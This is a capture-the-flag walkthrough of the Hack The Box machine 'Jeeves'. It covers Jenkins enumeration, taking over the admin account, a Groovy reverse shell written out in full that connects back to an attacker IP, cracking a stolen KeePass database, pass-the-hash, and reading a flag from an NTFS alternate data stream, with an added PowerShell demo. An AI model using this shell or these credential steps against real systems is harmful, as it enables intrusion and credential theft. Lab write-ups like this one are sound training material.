JEEVES - HTB walkthrough
Jenkins server exploit.
ENUMERATION
SCAN: Nmap scan for services and versions
80 HTTP ENUMERATION
Visiting the website, I see:
Every search lands on error.html, whatever you type.
Let's run gobuster and nikto scans.
They take a while; meanwhile we enumerate port 50000.
PORT 50000 JETTY ENUMERATION
Nothing but a snapshot that redirects to eclipse.org. So I searched for Jetty exploits and found:
The only candidate is a directory traversal, but it needs a known directory to traverse from before it is of any use to us.
Why not run a gobuster scan here too.
It took a while and gave the following results:
Great, we see /askjeeves on port 50000.
Clicking the notification shows that a new version, 2.88, is available, so the installed Jenkins is older than that.
So we have a page listing the users.
Editing admin shows
an option to configure the account.
I changed the password, saved it and logged in with it.
From https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/
I see that the Groovy script console can be abused for code execution. To do this without Metasploit, open the console as follows. Under Manage Jenkins we see
a Script Console; its path is /script.
EXPLOITATION
We get a reverse shell using the Groovy reverse shell from https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76. Our code:
String host = "10.10.14.14";   // attacker IP (our listener)
int port = 1234;               // port the nc listener is on
String cmd = "cmd.exe";        // shell to spawn; the target is Windows

// Spawn the shell and connect back; Groovy auto-imports java.io.* and java.net.*
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes in both directions until the socket closes or the shell exits
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
Start an nc listener on port 1234 and run the script.
We see we get the API token of admin. I first tried to change into the Administrator directory, but access was denied, so back to the usual enumeration to find user.txt.
PRIVILEGE ESCALATION
Getting system info.
Hotfixes are installed. Enumerating further, I see a KeePass database (.kdbx) in the user's Documents folder. Let's transfer it and crack it.
We use netcat to transfer it to our machine. On the attacking machine:
Once the transfer completes, terminate the session on your machine.
CRACKING THE kdbx PASSWORD
We use keepass2john (shipped with john) to turn the database into a crackable hash.
keepass2john prefixes the hash with the database name; trim that prefix off and pass the bare $keepass$ hash to hashcat (KeePass is hash mode 13400).
hashcat finally gave output. The password is moonshine1.
Now we open the database we copied.
For this we use keepassx:
sudo apt-get install keepassx
Then open the file; it asks for a password or key file. Select password, enter moonshine1 and open the database.
The "Backup stuff" entry holds an LM:NTLM hash rather than a password; we can try passing it. We will use a pass-the-hash tool for this.
Now for root.txt.
An Alternate Data Stream (ADS) is a feature of the NTFS file system (the main file system on Windows) that lets a file carry additional named data streams alongside the default stream normally used for the file's content.
Over the years it has become a way of hiding data from unsuspecting users. A plain dir shows only the default stream; dir /r lists every file together with its alternate data streams.
Getting the root flag:
Alternate way of reading an alternate data stream, via PowerShell:
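The following is an added example, not part of the original walkthrough and not taken from the box. It creates a file with an alternate data stream in a throwaway directory under %TEMP%, then shows the two ways of exposing it discussed above: cmd's dir /r and PowerShell's -Stream parameter. The directory, file and stream names (ads-demo, notes.txt, hidden.txt) and the stream contents are invented for the demo; on a real target you would run only the Find-AlternateStreams and Get-Content parts against the directories you can read.

```powershell
# Added example (not from the original walkthrough): build a file with an
# alternate data stream, then find and read it the way you would on an NTFS target.
# All names and contents below are invented for the demo.
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'notes.txt'

# The default stream ($DATA) holds decoy text; the interesting content goes
# into a named stream, which ordinary tools and a plain "dir" do not show.
Set-Content -Path $file -Value 'nothing to see here'
Set-Content -Path $file -Stream 'hidden.txt' -Value 'constructed-sample-secret'

# Classic cmd check: "dir /r" prints each file followed by its streams.
cmd /c "dir /r `"$dir`""

# PowerShell equivalent: enumerate every stream on every file under a path and
# keep only the non-default ones (the default stream is reported as ':$DATA').
function Find-AlternateStreams {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Select-Object FileName, Stream, Length
        }
}

$found = Find-AlternateStreams -Path $dir
$found | Format-Table -AutoSize

# Read each hidden stream directly. Get-Content -Stream is the PowerShell form
# of the file.txt:stream syntax used with "more <" in cmd.
foreach ($s in $found) {
    "--- $($s.FileName):$($s.Stream) ---"
    Get-Content -LiteralPath $s.FileName -Stream $s.Stream
}

# Remove the demo directory so nothing is left behind.
Remove-Item -Path $dir -Recurse -Force
```

Find-AlternateStreams uses -Force so hidden and system files are included, and -ErrorAction SilentlyContinue so directories you cannot read are skipped rather than aborting the sweep; pointing it at a user's Desktop or Documents folder is the quick way to spot a flag or credential tucked into a stream.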
ROOTED!!!